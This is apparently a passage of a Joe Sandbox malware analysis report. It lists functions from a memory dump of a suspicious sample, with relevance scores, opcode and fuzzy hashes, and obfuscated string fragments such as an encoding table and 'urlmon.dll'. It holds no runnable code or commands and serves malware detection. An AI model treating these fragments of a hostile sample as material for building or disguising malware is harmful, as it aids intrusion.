                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 475d2a380ede587fe2260259cfe897adcf26ff11c042f9c526b4772dbf01bc03
                                                      • Instruction ID: fba202b8c88a2be11d301c3decbba980f8b772696479cd06070238577ffc42b0
                                                      • Opcode Fuzzy Hash: 475d2a380ede587fe2260259cfe897adcf26ff11c042f9c526b4772dbf01bc03
                                                      • Instruction Fuzzy Hash: 58212EB6E0121CAFCB00DFA9D9409EFB7F9EF48250F10416AE909E7210E7719A058FE0
                                                      Function 02FCA4F9 Relevance: .1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e142642b34da3e33b69e24f4b007a474b9c8fc57e88ac5f4ded07d4518e54e4f
                                                      • Instruction ID: 230284de14fe5dcd0d718d2e5f067cdec97ba818f42d1a435c1591523bdd0340
                                                      • Opcode Fuzzy Hash: e142642b34da3e33b69e24f4b007a474b9c8fc57e88ac5f4ded07d4518e54e4f
                                                      • Instruction Fuzzy Hash: F911BEB1A04705ABD710DB58CC41FAF77A8DF89710F10450EFA18AB280D7706A00CBA1
                                                      Function 02FCB399 Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cde452634cc1f3fcb7d66f20f2e8984e11043ae3e311886356061152b2d6ed4e
                                                      • Instruction ID: b35cdefcec512a6e0ca49e9d3fa606a149845da66e1ab91ee1a3b7de637f0ce5
                                                      • Opcode Fuzzy Hash: cde452634cc1f3fcb7d66f20f2e8984e11043ae3e311886356061152b2d6ed4e
                                                      • Instruction Fuzzy Hash: 4C0184B2204509BBDB44DE99DC90EDB77ADEF8C754F108109BA1D93241D630F851CBA4
                                                      Function 02FC7049 Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2ee212dd70e847e9d57dd9ebfbaccc7452ba5116053a47720f42bf5345165b17
                                                      • Instruction ID: eb773df8ad7d16b590622800a0b95ca6b67d79a7b4daf2222adca6f574aab6e6
                                                      • Opcode Fuzzy Hash: 2ee212dd70e847e9d57dd9ebfbaccc7452ba5116053a47720f42bf5345165b17
                                                      • Instruction Fuzzy Hash: 0101D7F2D11219AFCB44DFE8D9419EEBBF9AB08740F14466AE919F3200E7705A048FA5
                                                      Function 02FA592E Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0e6d6aeaa075ab5faecf543c9c0e1a003aaa011f3e8a895a459c754fd1bfb1db
                                                      • Instruction ID: 1515fe19fcc5eb8f3f628893f972b9d7a3304ed403b7b315344375a95e478261
                                                      • Opcode Fuzzy Hash: 0e6d6aeaa075ab5faecf543c9c0e1a003aaa011f3e8a895a459c754fd1bfb1db
                                                      • Instruction Fuzzy Hash: C7F0BBB3A0011666D7105BBDAC90BDABB9CEF89374F244222FA58DB141D672D81586A0
                                                      Function 02FB9D53 Relevance: .0, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3add9b19641e9a3ca561258509d5c1a4da3ddf55c6f23014d9bc39e2b78fc16a
                                                      • Instruction ID: 38bedab67b543b3cd2129606762be46ecbc35c252a0677ddeaa864389296c36c
                                                      • Opcode Fuzzy Hash: 3add9b19641e9a3ca561258509d5c1a4da3ddf55c6f23014d9bc39e2b78fc16a
                                                      • Instruction Fuzzy Hash: 21F0C271C00119AAEB20BBA4DE04EFE7379DF84350F00428DFA0DA7181E67059468EA1
                                                      Function 02FCA5F9 Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 611c5d89fc7785f83afa4b1f2f52b1aca820fe2185c0b476b9aef72d0bf5d701
                                                      • Instruction ID: 8184d73be82a4e035fa338c191195d940807eb1373f224933ece0e71914227b8
                                                      • Opcode Fuzzy Hash: 611c5d89fc7785f83afa4b1f2f52b1aca820fe2185c0b476b9aef72d0bf5d701
                                                      • Instruction Fuzzy Hash: E7F01CB6210206BFD710EE99DC81EAB77ADEF88750F104419FA1C97241D670B9518BF0
                                                      Function 02FCB2B9 Relevance: .0, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6d2fd3d9d8fa43bb4c96a5e86d46db2439ffdec3bfb4a8501485fe68fbf598b1
                                                      • Instruction ID: b7228a66d9ef14f41568b45a40abe58bde1930e4e3609f823a0dc5081a53b2ef
                                                      • Opcode Fuzzy Hash: 6d2fd3d9d8fa43bb4c96a5e86d46db2439ffdec3bfb4a8501485fe68fbf598b1
                                                      • Instruction Fuzzy Hash: 5DE06DB12002047BD610EE59DC41E9B33ADEFC8750F004409FA0DA7241D7B0BD108AB4
                                                      Function 02FB9CB9 Relevance: .0, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a7a89bf0b7ff1966d1fd272edeaf3f836e071a560e24df1aff220d124b7741e0
                                                      • Instruction ID: 67759d80c33d17377b154cd30018d85168339009e88d51237827203828279be6
                                                      • Opcode Fuzzy Hash: a7a89bf0b7ff1966d1fd272edeaf3f836e071a560e24df1aff220d124b7741e0
                                                      • Instruction Fuzzy Hash: ACF08271D0520DEBDB14CFA8D841BDDBBB4EF04360F20836EE9259B280D63597508B81
                                                      Function 02FCD0F9 Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 10f700fedfa9f69d85bc77bfcaa90d4e8fcd5df2d8ad92ecdeca81baca7197c9
                                                      • Instruction ID: b75a58e330f650de5bef39b4e24623c1a02ebf0daf3fce27ca7a92e2c576066e
                                                      • Opcode Fuzzy Hash: 10f700fedfa9f69d85bc77bfcaa90d4e8fcd5df2d8ad92ecdeca81baca7197c9
                                                      • Instruction Fuzzy Hash: 27E02632B0021133E220158AAD05F9F73ADCBC4EA0F240039FF0C9B300E671A80143E0
                                                      Function 02FB9CB6 Relevance: .0, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8d04417c9546e40d6cfd720a498624c6c26dd99e735d87f81839b1fd37759cf6
                                                      • Instruction ID: cdb89d08813ef942cf09051712d6ffa6908be141b1e25427d23e5da4654ce18b
                                                      • Opcode Fuzzy Hash: 8d04417c9546e40d6cfd720a498624c6c26dd99e735d87f81839b1fd37759cf6
                                                      • Instruction Fuzzy Hash: A8E09271A15009EBDB08CFA4E941BEDBBA5EF04351F1083AEE919DB280D635DB948B40
                                                      Function 02FCAF99 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4d70b07d015640436ff79a030af5fda1140dbc98913e55b2ed826efc0772edf8
                                                      • Instruction ID: 5102deb7f88cf714516af9cd59d560887c9765688f0b2db5f74b9a101a1bf530
                                                      • Opcode Fuzzy Hash: 4d70b07d015640436ff79a030af5fda1140dbc98913e55b2ed826efc0772edf8
                                                      • Instruction Fuzzy Hash: EFE046762002047BDA20EA5ADC41F9B776DDBC9754F10485AFA0CA7241C770BA418AF0

                                                      Non-executed Functions

                                                      Function 02FB5A0B Relevance: 51.4, Strings: 41, Instructions: 168COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                      • API String ID: 0-3248090998
                                                      • Opcode ID: 4241983487a0923d64a08762c4611a23f430bfe5466dcb225cb066758c1d3509
                                                      • Instruction ID: a17024c8fa3abbe4e827f05c35ec160822085ca06c2c6e7cecdce889f44299d3
                                                      • Opcode Fuzzy Hash: 4241983487a0923d64a08762c4611a23f430bfe5466dcb225cb066758c1d3509
                                                      • Instruction Fuzzy Hash: BE91FFF08052998ACB118F55A5603DFBF71BB95304F1581E9C6AA7B243C3BE4E86DF50
                                                      Function 02FABF49 Relevance: 50.2, Strings: 40, Instructions: 152COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: J$ p$%'$($*$$*]$,G$,X$4T$:k$<$=$A$I4$In$J$JB$Ma$OC$Q}$Rr$Tl$U$VP$\$_:$_O$d$eL$f$m$n$pH$pw$rp$s$z`$~$9$f
                                                      • API String ID: 0-2424688085
                                                      • Opcode ID: 0241f576a3a8a69ceee388cafa85eee01302085c3cc7f0d5b1f62c543013b7cc
                                                      • Instruction ID: af527723812f66d9e07bf3db7cd04c84568a1533beacfabb9d52a8dd7ffb2511
                                                      • Opcode Fuzzy Hash: 0241f576a3a8a69ceee388cafa85eee01302085c3cc7f0d5b1f62c543013b7cc
                                                      • Instruction Fuzzy Hash: 6FC105B0D06669CAEB618F41C9987DEBAB1BB05308F5081C9C55C3B281C7BA1A89CF95
                                                      Function 02FC45C9 Relevance: 34.0, Strings: 27, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                      • API String ID: 0-1002149817
                                                      • Opcode ID: 25901e7c20f7354abc7d655ea1c977976a1770678b879a7dffbd48516f1992df
                                                      • Instruction ID: e2de10c607bb028ec614b50a23aee65f9ffb27add81aacfeab28d274bbae7233
                                                      • Opcode Fuzzy Hash: 25901e7c20f7354abc7d655ea1c977976a1770678b879a7dffbd48516f1992df
                                                      • Instruction Fuzzy Hash: FFC14EB1D0022CAADB20DFA5DD44BEEBBB9AF05344F1081DDD60CA7241E7B55A88CF95
                                                      Function 02FBCBB9 Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                      • API String ID: 0-392141074
                                                      • Opcode ID: 9b543ba098722968b5fa1639369ed1244405b457899f8b5c70d6db776eecd3b5
                                                      • Instruction ID: 10b7886f0037596362e1d541daa26d40fe9de60906f7906fd9f0800055e6b15e
                                                      • Opcode Fuzzy Hash: 9b543ba098722968b5fa1639369ed1244405b457899f8b5c70d6db776eecd3b5
                                                      • Instruction Fuzzy Hash: 43716FB1C10618ABDB15DFE4CD40FEEB77DAF44745F0441ADE609AA240EB745B888FA1
                                                      Function 02FBCBB6 Relevance: 16.4, Strings: 13, Instructions: 176COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                      • API String ID: 0-392141074
                                                      • Opcode ID: efbdb510190de87333c81ba02f0d420c3503882c7cae8e567bfc1aa38bdb48df
                                                      • Instruction ID: 27774e7203e8ce6e288bb034aebfcf28fb3f5f943b6cd9442cda32299b1c43c6
                                                      • Opcode Fuzzy Hash: efbdb510190de87333c81ba02f0d420c3503882c7cae8e567bfc1aa38bdb48df
                                                      • Instruction Fuzzy Hash: 966160B1C10618AADB15DFE4CD40FEEB77DAF44745F1041ADE609A6240EB74578C8F61
                                                      Function 02FB0770 Relevance: 13.8, Strings: 11, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                      • API String ID: 0-685823316
                                                      • Opcode ID: e04f8f2106aba0a9f6bbd9fe1db370d7d8aba9ddc80bba90d2a42d99d20a0962
                                                      • Instruction ID: a5195a8b24b2d77620d66204074502290ee8f19dbdf21dfca638796d29216ae0
                                                      • Opcode Fuzzy Hash: e04f8f2106aba0a9f6bbd9fe1db370d7d8aba9ddc80bba90d2a42d99d20a0962
                                                      • Instruction Fuzzy Hash: 8C31B1B1D41218BAEF50DFE4DC84FEEBBB9AF04744F14815DE608BA180DBB516488FA4
                                                      Function 02FB7C56 Relevance: 10.1, Strings: 8, Instructions: 133COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .$P$e$i$m$o$r$x
                                                      • API String ID: 0-620024284
                                                      • Opcode ID: 77300220f4a13f27e41ad65499c80c3e88828382581353aa69728ffb3e0a7a06
                                                      • Instruction ID: a8fad443568847d7053846fbca58108c24b4e1491de878fc5429733cc5c138b7
                                                      • Opcode Fuzzy Hash: 77300220f4a13f27e41ad65499c80c3e88828382581353aa69728ffb3e0a7a06
                                                      • Instruction Fuzzy Hash: 6241A5B1C00218B6EB21EFA4DD40FEE737DAF54740F1085ADA60DA7140EBB597898FA1
                                                      Function 02FC4E29 Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: L$S$\$a$c$e$l
                                                      • API String ID: 0-3322591375
                                                      • Opcode ID: 682fa9bbc6c9f6298211bf408d59e28f48b363cf0cee26abce7a0ef0de4fc895
                                                      • Instruction ID: fe50dc89c649daa3234cf2c24aece9ecc4683e2c1fefe1f3205ec18aaeb5d8c2
                                                      • Opcode Fuzzy Hash: 682fa9bbc6c9f6298211bf408d59e28f48b363cf0cee26abce7a0ef0de4fc895
                                                      • Instruction Fuzzy Hash: DB4194B2C00619AECB10DFA8DC84BEEB7F9EF88750F11816EDA09A7100E7715A458F94
                                                      Function 02FBC055 Relevance: 6.5, Strings: 5, Instructions: 201COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $i$l$o$u
                                                      • API String ID: 0-2051669658
                                                      • Opcode ID: d775bf1574670593f6cedc95f5e8738c703a8f6cc7e18ced4ba738e3d82837c1
                                                      • Instruction ID: e58f023124e9728db7c449b32b85c6f4ea26ec935022f9fc0ca5b1e15a99e35f
                                                      • Opcode Fuzzy Hash: d775bf1574670593f6cedc95f5e8738c703a8f6cc7e18ced4ba738e3d82837c1
                                                      • Instruction Fuzzy Hash: 06615EB1D00308AFDB25DBE5CC80FEFB7B9AF88754F108559E619A7240D734AA41CBA0
                                                      Function 02FBC059 Relevance: 6.4, Strings: 5, Instructions: 126COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $i$l$o$u
                                                      • API String ID: 0-2051669658
                                                      • Opcode ID: 87cfcc0d2aa8f5e09a6d974384a6056b7e59a16390a0453b67de1c0d4eb11dc4
                                                      • Instruction ID: f7a997dd57251d52bc93a6a3ec2f62a13c8053c920b3ad48ce3a77c226880e92
                                                      • Opcode Fuzzy Hash: 87cfcc0d2aa8f5e09a6d974384a6056b7e59a16390a0453b67de1c0d4eb11dc4
                                                      • Instruction Fuzzy Hash: B2410AB1900708AFDB21DFE5CC84FEFBBB9AF88744F104559E619A7240D770AA458BA0
                                                      Function 02FA8FA9 Relevance: 6.3, Strings: 5, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !$&$X$_$i
                                                      • API String ID: 0-3149547728
                                                      • Opcode ID: ea27a71d1baf22dfba401bbd8d9eb3609e2fad2e813c8d3c0a779191a4e16633
                                                      • Instruction ID: e54578d36e1907ac1dd3741d38741dfa5f646acbb827340f0b9ddb8e3356b536
                                                      • Opcode Fuzzy Hash: ea27a71d1baf22dfba401bbd8d9eb3609e2fad2e813c8d3c0a779191a4e16633
                                                      • Instruction Fuzzy Hash: 1311DB20D087CAD9DB12C7BC84086AEBF711F23224F0883D9D5F16B3D6D2B54206C7A2
                                                      Function 02FA53A9 Relevance: 6.3, Strings: 5, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -g+&$-g+&8/$8/$E:sx$sx;C
                                                      • API String ID: 0-930871490
                                                      • Opcode ID: 1fc91170322eff9f16a743ec565b38b131aec4198e82332303ae8dd2043c3390
                                                      • Instruction ID: 5694c8ae42a41c3affa70f426475e924c1e7973f9629d3e550dfd1df2414dfc7
                                                      • Opcode Fuzzy Hash: 1fc91170322eff9f16a743ec565b38b131aec4198e82332303ae8dd2043c3390
                                                      • Instruction Fuzzy Hash: F2E0D8B0D1035C6ACB04EFE8DC426EEBB35EF41340F60499CD955DB242E7B08A04CB86
                                                      Function 02FBBCE6 Relevance: 5.3, Strings: 4, Instructions: 303COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$k$o
                                                      • API String ID: 0-3624523832
                                                      • Opcode ID: be9493dddeaf5967cfd1d226c3bf24f26eeb4e073a1cf0ac4d5506df550b66a5
                                                      • Instruction ID: 5f1dca20dcb9678faf42caccbc5cf2f1ac3dcb4e052c05578e3fe5240558f827
                                                      • Opcode Fuzzy Hash: be9493dddeaf5967cfd1d226c3bf24f26eeb4e073a1cf0ac4d5506df550b66a5
                                                      • Instruction Fuzzy Hash: F9B14CB5A00308AFDB25DBA9CC80FEFB7B9AF88744F108559F619A7240D775AA01CB50
                                                      Function 02FBC629 Relevance: 5.2, Strings: 4, Instructions: 237COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$h$o
                                                      • API String ID: 0-3662636641
                                                      • Opcode ID: 3422d03d3311d62adec16181f81e1dc0e4e7de10eab4c6b891c0d97be83181f6
                                                      • Instruction ID: d78877adaec44a2c9d8f4cea42fdd670ad52f789cd2e53658180ab018b2eeaa5
                                                      • Opcode Fuzzy Hash: 3422d03d3311d62adec16181f81e1dc0e4e7de10eab4c6b891c0d97be83181f6
                                                      • Instruction Fuzzy Hash: DD8173B6900218AADB65DB94CC80FEF737DEF88740F00419DE749A6145EF705B898FA1
                                                      Function 02FBBCE9 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$k$o
                                                      • API String ID: 0-3624523832
                                                      • Opcode ID: 5ba035e0985e054600bac94e5c2b3b1d672d4c1e752e2c3d5853afa101767467
                                                      • Instruction ID: 058bd856f95d7113adee042705c0a9b7530ef41deb97562fb692efb38dce9f9e
                                                      • Opcode Fuzzy Hash: 5ba035e0985e054600bac94e5c2b3b1d672d4c1e752e2c3d5853afa101767467
                                                      • Instruction Fuzzy Hash: B2614AB5A00308AFDB25DFA5CC84FEFB7BDAF88704F108559E619A7244D771AA41CB60
                                                      Function 02FBBBA6 Relevance: 5.1, Strings: 4, Instructions: 123COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                      • API String ID: 0-2877786613
                                                      • Opcode ID: 91c418c8159298c687abc08d686a23a13c307923b2a5f9b472b9666d9ae818b2
                                                      • Instruction ID: 59791a0b9b3c0265db047d631201ae74fb1dc603045076b72f573742e2983d69
                                                      • Opcode Fuzzy Hash: 91c418c8159298c687abc08d686a23a13c307923b2a5f9b472b9666d9ae818b2
                                                      • Instruction Fuzzy Hash: FD416D71A11119BAEB01EB90CD42FEF777DAF55B40F104059FB00AB180E7B56A068BF6
                                                      Function 02FBBBA9 Relevance: 5.1, Strings: 4, Instructions: 120COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                      • API String ID: 0-2877786613
